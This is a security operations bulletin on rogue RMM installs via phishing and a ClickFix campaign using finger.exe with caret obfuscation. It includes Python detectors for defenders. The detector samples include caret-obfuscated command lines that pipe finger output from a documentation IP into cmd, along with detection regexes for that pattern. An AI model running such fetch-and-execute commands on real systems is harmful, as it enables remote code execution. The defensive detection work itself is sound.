Blackpoint SOC Threat Pulse: Week of June 29, 2026
In this week’s Threat Pulse, the Blackpoint Security Operations Center (SOC) breaks down a phishing attack in which threat actors weaponized trusted remote management tools to quietly take over a device, hiding in plain sight inside software organizations rely on for day-to-day business. The Adversary Pursuit Group dives into a trend the SOC has observed all year: ClickFix-style attacks have accounted for more than 30% of all incidents in 2026, and the latest campaign shows attackers are not slowing down.
Featured Incident: When Good Software Goes Bad
What we’re seeing
- The Blackpoint SOC detected the use of ScreenConnect on a host; further investigation identified a phishing attack as the initial access vector.
- The threat actor lured the victim into downloading purported backup software; the installer created a new firewall rule to allow the installation of two ScreenConnect instances and an RMM agent on the host.
- The threat actor deleted the firewall rule after the RMM tools were installed, likely in an attempt to evade detection.
What the Blackpoint SOC did
- The Blackpoint SOC immediately isolated the host to prevent additional malicious activity and cut off the threat actor’s access to the device.
Why this matters
- RMM tools are frequently used to maintain persistent access to a victim device while blending in with normal IT activity. Deploying several instances is likely meant to provide a fallback if one instance is detected and removed.
- Because these are legitimate tools, traditional security tooling has a harder time flagging them within the environment. Access to this single device could have led to a full system compromise, data theft, or the deployment of malware payloads.
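The add-then-delete firewall rule pattern described above is something a SOC can hunt for in Windows Security audit logs. The following is an added example, not Blackpoint tooling: it correlates a firewall rule that is created and removed within a short window (Security events 4946 and 4948) with RMM client process starts (event 4688) that fall between the two. The event records, file paths and timestamps are constructed for illustration.

```python
"""Correlate short-lived Windows Firewall rules with RMM client installs.

Added example for this Threat Pulse; it is not Blackpoint SOC tooling.
Assumptions: Windows Security audit events with the standard IDs
4946 (firewall exception rule added), 4948 (rule deleted) and
4688 (process created). All event records below are constructed.
"""
from datetime import datetime, timedelta

# Image-name fragments that identify RMM clients in 4688 NewProcessName.
# ScreenConnect is named in the incident; extend per environment.
RMM_IMAGE_KEYWORDS = ("screenconnect",)

# Constructed sample events (time, event_id, rule or image), not a real log.
SAMPLE_EVENTS = [
    {"time": "2026-06-24T09:00:00", "event_id": 4946, "rule": "File and Printer Sharing"},
    {"time": "2026-06-24T10:00:00", "event_id": 4688,
     "image": r"C:\Users\jdoe\Downloads\BackupSetup.exe"},
    {"time": "2026-06-24T10:00:05", "event_id": 4946, "rule": "Backup Helper"},
    {"time": "2026-06-24T10:00:40", "event_id": 4688,
     "image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2)\ScreenConnect.ClientService.exe"},
    {"time": "2026-06-24T10:01:10", "event_id": 4688,
     "image": r"C:\Program Files (x86)\ScreenConnect Client (c3d4)\ScreenConnect.ClientService.exe"},
    {"time": "2026-06-24T10:02:30", "event_id": 4948, "rule": "Backup Helper"},
    {"time": "2026-06-24T11:00:00", "event_id": 4946, "rule": "Dev Test Port"},
    {"time": "2026-06-24T11:03:00", "event_id": 4948, "rule": "Dev Test Port"},
]


def is_rmm_image(image: str) -> bool:
    """True if the process image path names a known RMM client."""
    lowered = image.lower()
    return any(keyword in lowered for keyword in RMM_IMAGE_KEYWORDS)


def find_transient_rule_abuse(events, max_lifetime=timedelta(minutes=30)):
    """Return one alert per firewall rule that was added and then deleted
    within max_lifetime while an RMM client process started in between.

    Rules that live longer, or that bracket no RMM process, are ignored so a
    routine administrative change does not alert on its own.
    """
    parsed = sorted(
        ({**e, "time": datetime.fromisoformat(e["time"])} for e in events),
        key=lambda e: e["time"],
    )
    processes = [e for e in parsed if e["event_id"] == 4688]
    open_rules = {}  # rule name -> time the 4946 was seen
    alerts = []
    for ev in parsed:
        if ev["event_id"] == 4946:
            open_rules[ev["rule"]] = ev["time"]
        elif ev["event_id"] == 4948 and ev["rule"] in open_rules:
            created = open_rules.pop(ev["rule"])
            if ev["time"] - created > max_lifetime:
                continue  # long-lived rule: outside the pattern we hunt for
            rmm_starts = [
                p["image"] for p in processes
                if created <= p["time"] <= ev["time"] and is_rmm_image(p["image"])
            ]
            if rmm_starts:
                alerts.append({
                    "rule": ev["rule"],
                    "created": created.isoformat(),
                    "deleted": ev["time"].isoformat(),
                    "rmm_processes": rmm_starts,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_transient_rule_abuse(SAMPLE_EVENTS):
        print(f"{alert['rule']!r} lived {alert['created']} -> {alert['deleted']}; "
              f"RMM client starts in window: {len(alert['rmm_processes'])}")
```

On the constructed sample only "Backup Helper" alerts: it lived under three minutes and two ScreenConnect client services started while it was open. The permanent sharing rule and the short-lived "Dev Test Port" rule with no RMM activity are ignored, which keeps the logic quiet on ordinary administration while still catching the cleanup step the threat actor used here.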
BROC Weekly Snapshot
What changed. What didn’t. What matters.
| Incidents Observed | Pre-Payload Disruptions | Pre-Ransom Interruptions |
| --- | --- | --- |
| >85 ↓ | 90% ↓ | N/A |
Campaign Statuses
| Campaign | Trend | Status | Share of incidents |
| --- | --- | --- | --- |
| Fake CAPTCHA/ClickFix | ↓ | Ongoing | 40% |
| Rogue RMM | ↑ | Escalating | 27% |
| Trojanized Installers | ↑ | Ongoing | 5% |
| SSL VPN Compromise | ↓ | Ongoing | 1% |
Quick Take
The Blackpoint SOC has increasingly responded to incidents involving ClickFix-style initial access methods. Between 01 Jan and 25 Jun 2026, these incidents have accounted for more than 30% of the total incidents. This style of attack is designed to bypass basic user skepticism by mimicking standard web elements, making it particularly effective in mass-targeting scenarios.
The Blackpoint SOC has observed a spike in ClickFix-style activity that aligns with an ongoing campaign deploying a C-based CastleLoader and a Python-based CastleLoader variant. Activity peaked in early June 2026. The campaign has rotated infrastructure while keeping its tradecraft consistent: every observed incident has used finger.exe as the initial retrieval mechanism, and the majority have used caret (^) obfuscation in the command.
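To show the finger.exe-plus-caret tradecraft from the defender's side, here is an added example (not Blackpoint SOC code) that normalizes caret-escaped command lines the way cmd.exe does and flags finger output being piped into a command interpreter. It assumes process-creation telemetry that exposes the full command line (Sysmon Event ID 1 or Security Event 4688 with command-line auditing enabled); the sample command lines are constructed and use a documentation address.

```python
"""Triage process command lines for caret-obfuscated finger.exe retrieval.

Added example for this Threat Pulse; not Blackpoint SOC code. It assumes
process-creation telemetry that exposes the full command line (for example
Sysmon Event ID 1 or Security Event 4688 with command-line auditing enabled).
The sample command lines are constructed and use a documentation IP.
"""
import re

# A bare word "finger" or "finger.exe" in command position.
FINGER_RE = re.compile(r"(?:^|[\s\"'&|;(])finger(?:\.exe)?(?=\s|$)")
# Output piped into a command interpreter, optionally path-qualified.
PIPE_TO_INTERPRETER_RE = re.compile(
    r"\|\s*\"?(?:[^\s\"|]*\\)?(?:cmd|powershell|pwsh)(?:\.exe)?\b"
)

# Constructed samples; 203.0.113.0/24 is a documentation range.
SAMPLE_COMMAND_LINES = [
    # 1: caret-obfuscated finger whose output is fed to cmd
    "cmd.exe /c f^i^n^g^e^r user@203.0.113.10 | c^m^d",
    # 2: same pattern without obfuscation
    "finger.exe admin@203.0.113.10 | cmd",
    # 3: carets present but benign (escaping angle brackets for echo)
    "cmd.exe /c echo ^<ok^>",
    # 4: finger alone, no interpreter behind it
    "finger jdoe@mailhost.example.invalid",
]


def deobfuscate_carets(cmdline: str) -> str:
    """Apply cmd.exe's escape rule: a caret makes the next character literal,
    so '^^' becomes '^' and a caret before any other character disappears.
    (A caret immediately before a newline is line continuation in cmd;
    single-line telemetry does not need that case.)"""
    out, i = [], 0
    while i < len(cmdline):
        if cmdline[i] == "^" and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 2
        elif cmdline[i] == "^":
            i += 1  # trailing caret escapes nothing
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)


def analyze_command_line(cmdline: str) -> dict:
    """Classify one command line after undoing caret obfuscation."""
    normalized = deobfuscate_carets(cmdline).lower()
    finger = bool(FINGER_RE.search(normalized))
    piped = bool(PIPE_TO_INTERPRETER_RE.search(normalized))
    if finger and piped:
        verdict = "finger_to_interpreter"  # retrieval pattern seen in ClickFix
    elif finger:
        verdict = "finger_only"  # rare in enterprises; worth a look
    else:
        verdict = "benign"
    return {
        "raw": cmdline,
        "normalized": normalized,
        "caret_count": cmdline.count("^"),
        "verdict": verdict,
    }


def triage(lines):
    """Analyze a batch of command lines; returns one dict per line."""
    return [analyze_command_line(line) for line in lines]


if __name__ == "__main__":
    for result in triage(SAMPLE_COMMAND_LINES):
        print(f"{result['verdict']:22} carets={result['caret_count']}  {result['normalized']}")
```

The point of normalizing before matching is that a keyword rule written against the raw command line sees `f^i^n^g^e^r` and never fires; applying cmd.exe's own escape rule first makes the obfuscated and plain variants indistinguishable to the detector. The caret count is kept as a separate signal because heavy escaping of an otherwise unremarkable command is itself unusual and can raise the priority of the alert.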
Figure 1: SOC-observed ClickFix incidents per month January-June 2026
Due to the widespread use of ClickFix as an initial access method, the Blackpoint SOC has identified several different malware variants as part of these incidents. The Blackpoint SOC has interrupted more than 75% of these incidents before any payload could be delivered and 100% of these before the attacker could complete their objective. The most common malware variants observed so far in 2026 include CastleLoader (14.3%), NetSupport RAT (6.1%), and Vidar Stealer (3.2%).
Analyst Note: ClickFix attacks can escalate from a single click to serious business risk, including downtime, loss of information, and more. Campaigns relying on ClickFix have proven scalable and continue to evolve and gain adoption. The Blackpoint SOC has identified these incidents each time, and the campaign highlights why rapid detection and response at the endpoint level is critical: without it, these incidents could have led to full system compromise, stolen data, and/or the deployment of second-stage malware, including ransomware.
Date published: June 30, 2026
Author: Blackpoint Cyber